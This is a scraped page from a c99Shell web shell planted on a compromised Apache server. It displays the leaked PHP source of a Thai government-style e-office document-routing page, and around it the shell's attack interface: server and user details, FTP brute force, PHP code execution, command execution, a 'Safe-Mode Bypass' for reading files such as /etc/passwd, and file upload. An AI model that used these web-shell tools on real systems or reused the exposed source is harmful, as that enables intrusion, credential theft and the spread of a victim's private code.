!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSendDocToPstest.php (10.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
include_once "template.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocLinePosition.php";
include_once "../class/clsDocLineConfig.php";
include_once "../class/clsReceiveSendType.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocSpeedLevel.php";
include_once "../class/clsDocSecreLevel.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocReceiveSend.php";
include_once "../class/clsProposeType.php";
include_once "funct.php";
include_once "../class/clsDocSendtoPsTmp.php";
include_once "../class/clsannounceDocType.php";
include_once "../class/clsannounceDocType.php";
include_once "getPrefix.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oDP4 = new Department($oC);

$oDPt = new Department($oC);
$oDPt2 = new Department($oC);
$oDPt3 = new Department($oC);
$oDPt4 = new Department($oC);

$oDP5 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oPS4 = new person($oC);
$oPS5 = new person($oC);
$oPS6 = new person($oC);
$oUG = new umgroup($oCu);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlc5 = new DocLineConfig($oC);
$oDlc6 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oDlp2= new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oRs8 = new DocReceiveSend($oC);
$oRs9 = new DocReceiveSend($oC);
$oRs10 = new DocReceiveSend($oC);
$oPt = new ProposeType($oC);
$oStmp=new DocSendToPsTmp($oC);
$oAn=new announceDocType($oC);
$oAn=new announceDocType($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();

doCheckAll();

    $oDoc->SearchByKey($DocID); $oDoc->GetRecord();
    $oDlc->SearchByKey(33); $oDlc->GetRecord(); 
    $oRs->SearchByKey($DrsID); $oRs->GetRecord(); 
    $DlcdeptId=$oDlc->deptId
?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="100%"  height="100%" border="0" align="center" cellpadding="0" cellspacing="0"  style="border-collapse:collapse">
  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_2"]; ?>" height=22>
    <td align="left" colspan="3">&nbsp;เลือกผู้รับหนังสือ</td>
  </tr>
  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
    <td height="22" valign="bottom" colspan="2">&nbsp;&nbsp;&nbsp;<strong>ส่งให้หน่วยงานย่อย [สารบรรณย่อย]</strong></td>
    <td width="7%" align="right"></td>
  </tr>
  <tr height=22 width="100%" align="center"> 
    <td align="center" colspan="3">
    <div style="overflow: auto; height: 120px; width: 100%;">
  <table bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>"  width="94%" border="0" cellpadding="0" cellspacing="0" align="center">
  <tr bgcolor="#F2F2F2"><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input name="checkAll" type="checkbox" value="1" <?    if($checkAll=="1"){  echo "checked";}?>>
  <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
  &nbsp;ส่งให้สารบรรณของทุกหน่วยงานย่อย<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  (ยกเว้นหน่วยงานย่อยของตนเอง)</font></td></tr>
 <?
     $oDPt->SearchByKey($oDlc->deptId);
    $oDPt->GetRecord();
    
    if($oDPt->deptParentId==0){
        $oDPt2->RSmenuByDeptParent2($oDPt->deptParentId);
        while($oDPt2->GetRecord()){
                $pssend=ShowSendtoPs($oDPt2->deptId); 
                if($pssend=="N"){ 
                ?>
                <input name="deptPs[<? echo $oDPt2->deptId?>]" type="hidden" value="" <?    if($deptPss[$oDPt2->deptId]!=$deptPs[$oDPt2->deptId]){  echo "checked";}?>>
                <? }else{ ?>
                <tr><td>&nbsp;
                <input name="deptPs[<? echo $oDPt2->deptId?>]" type="checkbox" value="<? echo $pssend?><?  if($deptPss[$oDPt2->deptId]!=$deptPs[$oDPt2->deptId]){  echo "checked";}?>>
                <?
                    $oDlc4->SearchByKey($pssend); $oDlc4->GetRecord(); 
                    $oPS2->SearchByKey($oDlc4->personId); $oPS2->GetRecord();         
                    echo "$oDPt2->deptName&nbsp;[".GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName."]";   echo "deptPs=".$pssend." deptPssend=".$oDlc4->personId;
                    $nextpssend=searchnextpssend($pssend,$oDPt2->deptId);  $oRs9->searchHaveSendDoc($pssend,$nextpssend,$searchDoc); if($oRs9->GetRecord()==1){?><img src="../picture/yes.gif"  border="0"  alt="หมายถึงหน่วยงานย่อยหรือบุคลากรผู้นั้น เคยได้รับหนังสือนี้แล้ว"> <? ?>
                    <input name="deptPssend[<? echo $oDPt2->deptId?>]" type="hidden" value="<? echo $oDlc4->personId?>">
                    <?
                 }
        }
    }else{  //-----------have deptparent
        $oDPt2->SearchByKey($oDPt->deptParentId);
        $oDPt2->GetRecord();
        $pssend=ShowSendtoPs($oDPt2->deptId); 
        ?>
        <tr><td>&nbsp;
                <input name="deptPs[<? echo $oDPt2->deptId?>]" type="checkbox" value="<? echo $pssend?><?  if($deptPss[$oDPt2->deptId]!=$deptPs[$oDPt2->deptId]){  echo "checked";}?>>
        <?
                    $oDlc4->SearchByKey($pssend); $oDlc4->GetRecord(); 
                    $oPS2->SearchByKey($oDlc4->personId); $oPS2->GetRecord();         
                    echo "$oDPt2->deptName&nbsp;[".GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName."]";   echo "deptPs=".$pssend." deptPssend=".$oDlc4->personId;
                    $nextpssend=searchnextpssend($pssend,$oDPt2->deptId);  $oRs9->searchHaveSendDoc($pssend,$nextpssend,$searchDoc); if($oRs9->GetRecord()==1){?><img src="../picture/yes.gif"  border="0"  alt="หมายถึงหน่วยงานย่อยหรือบุคลากรผู้นั้น เคยได้รับหนังสือนี้แล้ว"> <? ?>
                    <input name="deptPssend[<? echo $oDPt2->deptId?>]" type="hidden" value="<? echo $oDlc4->personId?>">
        </td></tr>
    <?
        $oDPt3->RSmenuByDeptParent2($oDPt2->deptId);
        while($oDPt3->GetRecord()){
        $pssend=ShowSendtoPs($oDPt3->deptId); 
        ?>
        <tr><td>&nbsp;
                <input name="deptPs[<? echo $oDPt3->deptId?>]" type="checkbox" value="<? echo $pssend?><?  if($deptPss[$oDPt3->deptId]!=$deptPs[$oDPt3->deptId]){  echo "checked";}?>>
        <?
                    $oDlc4->SearchByKey($pssend); $oDlc4->GetRecord(); 
                    $oPS2->SearchByKey($oDlc4->personId); $oPS2->GetRecord();         
                    echo "&nbsp;&nbsp;<b>$oDPt3->deptName</b>&nbsp;[".GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName."]";   echo "deptPs=".$pssend." deptPssend=".$oDlc4->personId;
                    $nextpssend=searchnextpssend($pssend,$oDPt3->deptId);  $oRs9->searchHaveSendDoc($pssend,$nextpssend,$searchDoc); if($oRs9->GetRecord()==1){?><img src="../picture/yes.gif"  border="0"  alt="หมายถึงหน่วยงานย่อยหรือบุคลากรผู้นั้น เคยได้รับหนังสือนี้แล้ว"> <? ?>
                    <input name="deptPssend[<? echo $oDPt3->deptId?>]" type="hidden" value="<? echo $oDlc4->personId?>">
        </td></tr>
        <?
                if($oDPt3->deptId==$oDPt->deptId){
                    $oDPt4->RSmenuByDeptParent2($oDPt3->deptId);
                    while($oDPt4->GetRecord()){
                            $pssend=ShowSendtoPs($oDPt4->deptId); 
                                ?>
                                <tr><td>&nbsp;
                                        <input name="deptPs[<? echo $oDPt4->deptId?>]" type="checkbox" value="<? echo $pssend?><?  if($deptPss[$oDPt4->deptId]!=$deptPs[$oDPt4->deptId]){  echo "checked";}?>>
                                <?
                                            $oDlc4->SearchByKey($pssend); $oDlc4->GetRecord(); 
                                            $oPS2->SearchByKey($oDlc4->personId); $oPS2->GetRecord();         
                                            echo "&nbsp;&nbsp;&nbsp;&nbsp;$oDPt4->deptName&nbsp;[".GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName."]";   echo "deptPs=".$pssend." deptPssend=".$oDlc4->personId;
                                            $nextpssend=searchnextpssend($pssend,$oDPt4->deptId);  $oRs9->searchHaveSendDoc($pssend,$nextpssend,$searchDoc); if($oRs9->GetRecord()==1){?><img src="../picture/yes.gif"  border="0"  alt="หมายถึงหน่วยงานย่อยหรือบุคลากรผู้นั้น เคยได้รับหนังสือนี้แล้ว"> <? ?>
                                            <input name="deptPssend[<? echo $oDPt4->deptId?>]" type="hidden" value="<? echo $oDlc4->personId?>">
                                </td></tr>
                                <?
                    }
                }
        }            
    }
?>  
</table>
  </div>
    </td>
  </tr>
  <tr height=22>
    <td height=22 bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" colspan="3">&nbsp;&nbsp;&nbsp;<strong>ส่งให้บุคลากรในหน่วยงานท่าน</strong></td>
  </tr>
  <tr><td colspan="3">
  <div style="overflow: auto; height: 120px; width: 100%;">
  <table bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>"   width="94%" >
  <tr bgcolor="#F2F2F2"><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input name="checkAllPs" type="checkbox" value="1" <?    if($checkAllPs=="1"){  echo "checked";}?>>
   <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
  &nbsp;ส่งให้ทุกคนในหน่วยงานย่อย</font></td></tr>
  <input name="deptId" type="hidden" value="<? echo $DlcdeptId?>">
  <? $oPS2->SearchByDeptIdadminId($DlcdeptId); 
          while($oPS2->GetRecord()){     
     ?>
  <tr> 
    <td>

    <input name="mainPs" type="hidden" value="0" id="mainPs0" onClick="radioSelectType('0')">
    <?    if($PtID!=""){   
                    if($PtID!="1" && $PtID!="2"){   
                                $canselect=1;  
                    } 
              }else if($oRs->PtID!=""){  
                    if($oRs->PtID!="1" &&  $oRs->PtID!="2"){   
                                $canselect=1;     
                    }   
            }  
    
         if($canselect==1){?>
    &nbsp;<input name="mainPs" type="radio" value="<? echo $oPS2->personId?>" id="mainPs<? echo $oPS2->personId?>" onClick="radioSelectType('<? echo $oPS2->personId?>')" <?    if($mainPsselect==$oPS2->personId){  echo "checked"?><? }?>>
    <? ?>
    &nbsp;<? //echo "[".$oPS2->personId."]"; ?><input name="Ps[<? echo $oPS2->personId?>]" type="checkbox" value="1" <?    if(($Pss[$oPS2->personId]!=$Ps[$oPS2->personId]) || ($mainPsselect==$oPS2->personId) ){  echo "checked";}?>>&nbsp;
     <? $oRs10->searchHaveSendDocps($oPS2->personId,$searchDoc); if($oRs10->GetRecord()==1){?><img src="../picture/yes.gif"  border="0"  alt="หมายถึงหน่วยงานย่อยหรือบุคลากรผู้นั้น เคยได้รับหนังสือนี้แล้ว"> <? ?>
              &nbsp;<? echo GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName?></td>
  </tr>
  <? ?>
  </table>
  </div>
  </td></tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0083 ]--